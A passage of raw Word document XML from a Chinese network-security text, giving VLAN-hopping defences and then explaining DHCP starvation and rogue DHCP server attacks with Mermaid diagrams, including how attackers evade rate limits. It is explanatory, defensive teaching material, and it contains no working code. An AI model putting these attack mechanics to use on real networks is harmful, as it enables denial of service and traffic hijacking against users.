          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">链路与本征</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在需要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口上，明确指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">switchport trunk allowed vlan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表，仅放行必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN，避免攻击者能够获得所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的访问权。将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置为一个未用于用户数据流量的特殊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN（例如一个不存在的或专用的空</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN），并且不要在任何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口上出现。同时，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路上对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量也强制打标签（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vlan dot1q tag native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），彻底消灭无标签帧的漏洞【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口安全（Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在接入端口启用端口安全，限制允许的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址数量，防止攻击者使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模拟交换机发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧（通常需要多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址或特殊软件），并可配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址粘滞学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志与监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：开启交换机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Syslog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录端口模式变更、DTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商事件，并通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SNMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或流式遥测将日志接入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统。任何端口从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的行为都应触发告警【②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境相关】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">管理员定期的配置审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：借助自动化工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cisco ConfD、NAPALM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）获取端口配置快照，比对基线，及时发现未授权的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口或错误模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="128" w:name="dhcp-攻击原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议在设计之初便内建了一种乐观假设：网络中只存在可信任的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，客户端会接受最先收到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFER。在真实的二层广播域中，任何主机都可以发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息，且没有内建的服务器真实性验证机制。这就催生了两种经典的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">饿死攻击（DHCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Starvation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">伪造服务器攻击（Rogue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Server）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。两者均可视为对“同一广播域内所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参与者均为善意”这一假设的违反【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理：DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 2131 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未定义服务器认证扩展，安全性完全依赖链路层隔离】。关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">四步交互流程（DISCOVER–OFFER–REQUEST–ACK）以及租约时间、中继代理等概念，已在《从位到物联》DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节详述，此处直接在其基础上分析攻击机理。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="126" w:name="dhcp-饿死攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饿死攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者从同一广播域内向合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发送大量伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCPDISCOVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文，每个报文的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址随机变化（即伪造大量不同的客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC）。合法服务器会为每一个“客户端”分配一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址并进入临时保留状态，直到地址池被耗尽。一旦地址池枯竭，新加入网络的合法用户将无法获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，导致拒绝服务。攻击者也可结合慢速率工具，长时间逐步消耗地址池，以绕过基于速率的简单检测【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理】。部分交换机支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的速率限制，可以缓解此类洪水，但攻击者也可以运用低速、持续伪造的方式使防御失效，前提是管理员未设置极低阈值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">机理示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Mermaid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Attacker as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(伪造多变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant DHCPServer as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">合法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大量虚假请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker-&gt;&gt;DHCPServer: DHCPDISCOVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCPServer-&gt;&gt;Attacker: DHCPOFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(预留地址)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over DHCPServer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址池耗尽</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant LegitUser as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">合法客户端</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> LegitUser-&gt;&gt;DHCPServer: DHCPDISCOVER</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCPServer--&gt;&gt;LegitUser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无可用地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">图中仅演示原理，实际攻击工具可控制请求速率与源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变化策略，以绕过简单的限速配置【③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简化/示意】。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkStart w:id="127" w:name="dhcp-伪造服务器攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造服务器攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者在广播域内部署一个非法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（可以是笔记本电脑或受控设备），一旦运行即监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCPDISCOVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">广播。当合法客户端发起地址请求时，伪造服务器和合法服务器都会收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DISCOVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并均发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFER。但由于客户端通常采用“先到先得”的机制，如果攻击者能够使自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更早到达客户端（例如通过降低网络延迟或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">快速响应工具），客户端就会接受伪造服务器提供的网络配置。攻击者可以在提供的选项中设置恶意的默认网关（指向攻击者自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP）或恶意的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，从而实现流量劫持、中间人攻击或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向。这种攻击不需要耗尽地址池，只需比合法服务器更快回应即可【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理】。更隐蔽的攻击者甚至能选择性劫持，仅为特定目标客户端提供恶意配置，而对其他客户端透明放行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击位置图示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Mermaid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart LR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[合法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
